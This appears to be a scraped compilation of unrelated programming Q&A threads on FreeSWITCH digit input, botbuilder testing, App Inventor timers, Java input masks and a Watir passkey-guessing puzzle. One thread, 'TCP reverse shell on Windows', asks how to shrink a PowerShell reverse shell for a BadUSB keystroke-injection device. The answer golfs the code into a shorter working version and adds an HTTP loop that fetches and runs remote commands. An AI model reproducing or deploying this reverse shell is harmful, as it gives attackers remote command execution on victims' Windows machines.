play_and_get_digits no input vs wrong input in Freeswitch - freeswitch

I am trying to implement the play_and_get_digits using ESL in nodejs.
The code is quite simple:
conn.execute('play_and_get_digits', ${minValue} ${maxValue} ${tries} ${timeout} ${terminator} ${soundFile} ${invalidFile} ${var_name} ${regex} ${digit_timeout}`);
It works well. My only problem is when the caller does not enter anything. By default, it plays the audio defined in invalidFile which I use to inform the caller the value they entered is not valid. I would like to be able to differentiate between wrong input (e.g. digit 5 when only 1 or 2 are allowed) and no input at all.
What would the best way to do this be?


botbuilder DialogTestClient 's sendActivity only accepts strings and not numbers

I am using the botbuilder DialogTestClient 's sendActivity method to send prompts to my bot while testing but the method only accepts string types and in my bot i use number promts to prompt the user for numbers . Do you have any idea on how i can overturn this problem ?
Thanks in advance
I'm a bit unclear if you are having this issue only for DialogTestClient or all Clients, but in nodejs you can just convert the string to number using Number(promptInput). If the promptInput is already a number, it will still work fine. I assume there is a similar function in C#.
Edit: Some additional context. You can take a look at userProfileDialog.js in multi-turn-prompt sample for an example. Essentially, NumberPrompt has a "succeeded" property in the recognizer that ensures you entered a number. You can use that plus whatever validations you want in the validator function. If it succeeds and is validated, a number, not a string, is passed to the next step in your dialog.
If the error is coming when you are trying to repeat back the prompt value to the user, you need to convert it to a string. I favor using the backtick for this (template string/literal), e.g.
await step.context.sendActivity(`You entered ${step.result}`);
where step.result is the numberPrompt result.

TCP reverse shell on Windows

I am trying to implement a proof of concept BadUSB DigiSpark that can emulate a HID keyboard and open a reverse shell just using Windows default package (i.e. PowerShell and/or CMD).
What I have found so far:
#$sm=(New-Object Net.Sockets.TCPClient("",55555)).GetStream();
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Taken from Week of PowerShell Shells - Day 1.
Despite working, the aforementioned code takes too long to be typed.
Is it possible to create a reverse shell with fewer lines of code?
284 characters. Yes you can have fewer "lines of code" just by putting them all on one line, and you can't have fewer than one line, so hooray, best case already achieved.
:-| face for not even using the same tricks consistently within the same code. And for not giving any way to test it.
remove all the semicolons.
remove the space around -ne 0
remove -ne 0 because numbers cast to true and 0 casts to false
single character variable names
drop port 55555 to 5555
Change byte array from
$b=[byte[]]'0'*256 # does it even need to be initialized to 0? Try without
Nest that into the reading call because who cares if it gets reinitialized every read.
[byte[]]$bt=0..255|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;
You can call [text.encoding]::ASCII.GetString($b) directly, but why ASCII? If it works if you can drop the encoding, then do
$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);
but you're only using that to call iex so put it there and don't use a variable for it. And do similar to make the byte array without calling ASCII as well...
... and: 197 chars, 30% smaller:
$t=(new-object Net.Sockets.TCPClient("",5555)).GetStream()
Assuming it works, with no way to test it, it probably won't.
Edit: I guess if you can change the other side completely, then you could make it so the client would use JSON to communicate back and forth, and do a tight loop of
$u='';while(1){irm $u -m post -b(iex(irm $u).c)}
and your server would have to have the command ready in JSON like {'c':'gci'} and also accept a POST of the reply...
untested. 67 chars.

The operation TimerInterval cannot accept the arguments: [(1800)] in App Inventor 2

I'm stuck on an error in my App Inventor 2 application. I' m using three checkboxes, so the user to pass values to a timer interval in a clock component.
The values are stored in a variable as a list of three values of miliseconds (e.g. 1600, 1800, 2000). I check in code when and which checkbox is checked and then pass it over to a TinyDB database as a tag.
Problem is that, in Do it and on the device running the app, I get the following error as title suggests.
Here is the coding blocks I've used so far:
Does anyone be kind enough to direct me to how solving this error? Is it possible to pass values to a clock component through this logic. I've used a listPicker with success sometime ago, but I need it done with a checkBoxes layout. Thank you all in advance for your answers.
To overcome this error and before #Taifun's remarks and suggestions, I followed the variable path, to pass values in the timer interval field. Do not now if it is very efficient but it is working for now. Here is the coding blocks:
Bracket pairs like this () represent a list.
The operation TimerInterval cannot accept the arguments: [(1800)]
This is, what the error message is trying to tell you: You are trying to assign a list, which has the item 1800 inside, to the TimerInterval property of a clock component.
You should assign the value directly instead.
Also you should think about the default value: which value should be used, if the user did not store anything in TinyDB... You are currently using an empty string in the valueIfTagNotThere socket... This does not really make sense... A better value would be for example 1000 ... same for the else part in your if-then-else statement...

Can I use Ruby Cucumber Watir to Solve a Key Pass to URL puzzle?

I am a NEWBIE. Any help is appreciated.
I've been given the challenge of automating a Key Pass challenge.
a URL is provided (this is an example, I don't think the creator of the challenge wants it in public):
When you visit the site, the body text simple returns, Key Denied:
If you add the following path, www.guessmypasskey/?key=a the site will return: Key Denied:00
The key is only alphanumeric and of unknown length...through manual testing I was able to find the key by determining that the binary code returns meant the following: 00 not a character used, 01 character used, wrong position, 11 correct character, correct position.
I envision, opening a browser to the URL with watir, checking a-a, A-Z, 0-9, in the first position...if 00 is displayed on page, delete character from possibility, if 01 is present write the number to a file (this will determine the character length needed.
Basic question, Am I going the wrong direction? Trying to automate with Ruby Cucumber Watir?
I know additional steps will be needed t determine the order of the characters....I'm just trying to get started on the first step, confirming the validity of the characters and the length of the pass key.
Kind of disappointed that the URL the real one. =p
Anyways, that approach would work... but I would imagine it being massive overkill.
Instead, what I would do is simply create a simple Node.js script (using JavaScript) which basically just loops through all possible combinations for each character, stepping through as you move.
You can just use the simple "request" module to request the web page. Then just build up your string like that.
var request = require('request');
// Gets content of one call... add this to your loop somehow.
request({uri: '' + key}, function (err, response, body) {
// body has the result to check
This is probably going to be infinitely easier than setting up the tech stack you were talking about... not to mention a lot faster.
Your general approach (ignoring technology) sounds pretty spot on.

Java applet - Real-time textfield input verification

I'm trying to develop an input real-time verification on a textfield in a Java applet.
The idea would be to have an input field that, if empty, once the user clicks in it it would show something like "0,00". Once the user starts to press the keys, only numbers should be accepted, and it would start to fill the text like this (imagine I input the numbers:
"0,01" -> "0,12" -> "1,23" -> "12,34" -> "123,45" -> "1.234,56".
If the field is not empty the user can change the values but there will always be a "," dividing the decimal numbers.
I've been able to allow only numbers to be accepted but how can produce this kind of behavior? I know this may be a very specific question but any links or examples would be much appreciated. Thank you.
You will have to provide an input handler, that not only filters the input, but also calls a preset callback (made by you), that will update the required field in the way you want it to be updated.
You can use some functions, that can format numbers, given a specific format.
Basically, just keep a count on number of digits, already input, then parse it as a plain integer then multiply it by a power of 10, derived from the format, in your example would be something like 10 raised to the power of (numberOfInputDigits -2).
